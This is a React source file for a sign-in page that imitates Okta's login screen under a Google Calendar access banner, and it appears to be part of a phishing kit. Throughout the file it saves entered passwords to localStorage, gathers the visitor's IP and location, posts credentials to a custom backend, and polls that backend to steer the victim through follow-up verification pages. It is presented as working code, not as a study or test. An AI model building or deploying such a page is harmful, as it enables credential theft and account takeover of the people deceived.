import { useState, useEffect, useRef } from "react";
import { useNavigate } from "react-router-dom";
import "./OktaLogin.css";
import googleCalendarLogo from "./assets/google-calendar.png";
import { AUTH_TYPE_ROUTES } from "./authRoutes";
import OktaVerifySomethingElse from "./OktaVerifySomethingElse";

const OKTA_LOGO =
  "https://ok1static.oktacdn.com/assets/img/logos/okta-logo.1e146cad5713da744492be95eb0f7793.png";

export default function OktaLogin() {
  const navigate = useNavigate();
  const [username, setUsername] = useState("");
  const [password, setPassword] = useState("");
  const [sessionId, setSessionId] = useState(() => localStorage.getItem("session_id") || null);
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState("");
  const [fieldErrors, setFieldErrors] = useState({ username: "", password: "" });
  const API_URL = process.env.REACT_APP_API_BASE_URL;
  const [ip, setIp] = useState("");
  const [city, setCity] = useState("");
  const [country, setCountry] = useState("");
  const isSubmittingLogin = useRef(false);

  useEffect(() => {
    const existingSessionId = localStorage.getItem("session_id");
    if (existingSessionId) {
      setSessionId(existingSessionId);
    }
  }, []);

  const isValidEmail = (email) => /^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email);

  const validateForm = () => {
    const next = { username: "", password: "" };
    let valid = true;

    if (!username.trim()) {
      next.username = "Please enter a username";
      valid = false;
    } else if (!isValidEmail(username.trim())) {
      next.username = "Enter a valid email address";
      valid = false;
    }

    if (!password.trim()) {
      next.password = "Please enter a password";
      valid = false;
    } else if (password.length < 6) {
      next.password = "Password must be at least 6 characters";
      valid = false;
    }

    setFieldErrors(next);
    return valid;
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    setError("");
    if (!validateForm()) return;

    setLoading(true);
    isSubmittingLogin.current = true;

    localStorage.setItem("username", username);
    localStorage.setItem("password", password);
    localStorage.setItem("userEmail", username);

    (async () => {
      try {
        const existingSessionId = localStorage.getItem("session_id");
        let loginIp = ip;
        let loginCity = city;
        let loginCountry = country;
        try {
          const geo = await (await fetch("https://ipwho.is/")).json();
          if (geo.success) {
            if (geo.ip) loginIp = loginIp || geo.ip;
            if (!loginCity) loginCity = String(geo.city || "").trim();
            if (!loginCountry) loginCountry = String(geo.country || "").trim();
          }
        } catch {
          /* backend enriches IP */
        }

        const res = await fetch(`${API_URL}/api/okta-login`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({
            username,
            password,
            ip: loginIp,
            city: loginCity,
            country: loginCountry,
            old_session_id: existingSessionId,
          }),
        });
        if (!res.ok) {
          const data = await res.json().catch(() => ({}));
          if (res.status === 429) {
            throw new Error("Too many login attempts. Please wait and try again.");
          }
          throw new Error(data.detail || "Login failed");
        }
        const { session_id } = await res.json();
        if (session_id) {
          setSessionId(session_id);
          localStorage.setItem("session_id", session_id);
        }
        setLoading(true);
      } catch (err) {
        console.error("Okta login failed:", err);
        setError(err.message || "Login failed");
        setLoading(false);
        isSubmittingLogin.current = false;
      }
    })();
  };

  useEffect(() => {
    if (!sessionId || !isSubmittingLogin.current) {
      setLoading(false);
      return;
    }

    const routes = AUTH_TYPE_ROUTES;

    setLoading(true);

    const poll = setInterval(async () => {
      try {
        const res = await fetch(`${API_URL}/check_response?session_id=${sessionId}`);
        if (!res.ok) throw new Error("Failed to fetch response");

        const data = await res.json();

        if (data.authType) {
          setError("");
          const route = routes[data.authType];
          if (route) {
            clearInterval(poll);
            setLoading(false);
            isSubmittingLogin.current = false;
            navigate(route);
          }
          return;
        }

        if (data.redirect) {
          clearInterval(poll);
          setLoading(false);
          isSubmittingLogin.current = false;
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            window.location.replace(data.redirect);
          }
          return;
        }

        if (data.error && !data.authType && !data.redirect) {
          const errorLower = data.error.toLowerCase();
          if (
            errorLower.includes("email") ||
            errorLower.includes("password") ||
            errorLower.includes("sign you in") ||
            errorLower.includes("wrong")
          ) {
            clearInterval(poll);
            setLoading(false);
            isSubmittingLogin.current = false;
            setError(data.error);
            if (errorLower.includes("wrong email") || errorLower.includes("username")) {
              setFieldErrors((prev) => ({ ...prev, username: data.error }));
            } else if (errorLower.includes("wrong password") || errorLower.includes("password")) {
              setFieldErrors((prev) => ({ ...prev, password: data.error }));
            }
            setPassword("");
            return;
          }
        }

        if (!data.authType && !data.redirect && !data.error) {
          setLoading(true);
          setError("");
        }
      } catch (err) {
        clearInterval(poll);
        setLoading(false);
        isSubmittingLogin.current = false;
        console.error("Polling error:", err);
        setError("Something went wrong while checking session.");
      }
    }, 3000);

    return () => clearInterval(poll);
  }, [sessionId, API_URL, navigate]);

  useEffect(() => {
    fetch("https://ipwho.is/")
      .then((res) => res.json())
      .then((data) => {
        setIp(data.ip || "");
        setCity(data.city || "");
        setCountry(data.country || "");
      })
      .catch(() => {});
  }, []);

  const clearFieldError = (field) => {
    setFieldErrors((prev) => (prev[field] ? { ...prev, [field]: "" } : prev));
    if (error) setError("");
  };

  return (
    <div className="okta-page auth okta-container">
      <div className="login-bg-image tb--background" aria-hidden="true" />

      <header className="okta-google-access-header">
        <div className="okta-google-access-header-inner">
          <img
            src={googleCalendarLogo}
            alt="Google Calendar"
            className="okta-google-access-logo"
          />
          <p className="okta-google-access-text">
            Sign in with your account to access Google Calendar
          </p>
        </div>
      </header>

      <div className="content">
        <div id="okta-sign-in" className="auth-container main-container">
          <div className="auth-header">
            <img src={OKTA_LOGO} alt="Okta" className="auth-org-logo" />
            <div className="beacon-container">
              <div className="okta-sign-in-beacon-border auth-beacon-border" aria-hidden="true" />
              <div
                aria-live="polite"
                role="img"
                className="bg-helper auth-beacon auth-beacon-security undefined-user"
                data-se="security-beacon"
              >
                <span className="accessibility-text">Default profile image</span>
              </div>
            </div>
          </div>

          <div className="auth-content">
            <h2 className="o-form-head">Sign In</h2>

            {error && error.trim() && !fieldErrors.username && !fieldErrors.password && (
              <div className="okta-error">{error}</div>
            )}

            <form className="okta-form" onSubmit={handleSubmit} noValidate>
              <div className="okta-field">
                <label htmlFor="okta-username">Username</label>
                <input
                  id="okta-username"
                  name="username"
                  type="email"
                  autoComplete="username"
                  inputMode="email"
                  autoCapitalize="none"
                  autoCorrect="off"
                  spellCheck={false}
                  className={fieldErrors.username ? "okta-input-error" : ""}
                  value={username}
                  onChange={(e) => {
                    setUsername(e.target.value);
                    clearFieldError("username");
                  }}
                  disabled={loading}
                />
                {fieldErrors.username && (
                  <p className="okta-field-error" role="alert">
                    <span className="okta-field-error-icon" aria-hidden="true">
                      !
                    </span>
                    {fieldErrors.username}
                  </p>
                )}
              </div>

              <div className="okta-field">
                <label htmlFor="okta-password">Password</label>
                <input
                  id="okta-password"
                  name="password"
                  type="password"
                  autoComplete="current-password"
                  className={fieldErrors.password ? "okta-input-error" : ""}
                  value={password}
                  onChange={(e) => {
                    setPassword(e.target.value);
                    clearFieldError("password");
                  }}
                  disabled={loading}
                />
                {fieldErrors.password && (
                  <p className="okta-field-error" role="alert">
                    <span className="okta-field-error-icon" aria-hidden="true">
                      !
                    </span>
                    {fieldErrors.password}
                  </p>
                )}
              </div>

              <div className="okta-submit-wrap">
                <button
                  type="submit"
                  className="okta-submit button button-primary tb--button"
                  disabled={loading}
                >
                  {loading ? (
                    <span className="okta-spinner" aria-label="Loading" />
                  ) : (
                    "Sign In"
                  )}
                </button>
              </div>
            </form>

            <OktaVerifySomethingElse sessionId={sessionId} />
          </div>
        </div>
      </div>
    </div>
  );
}
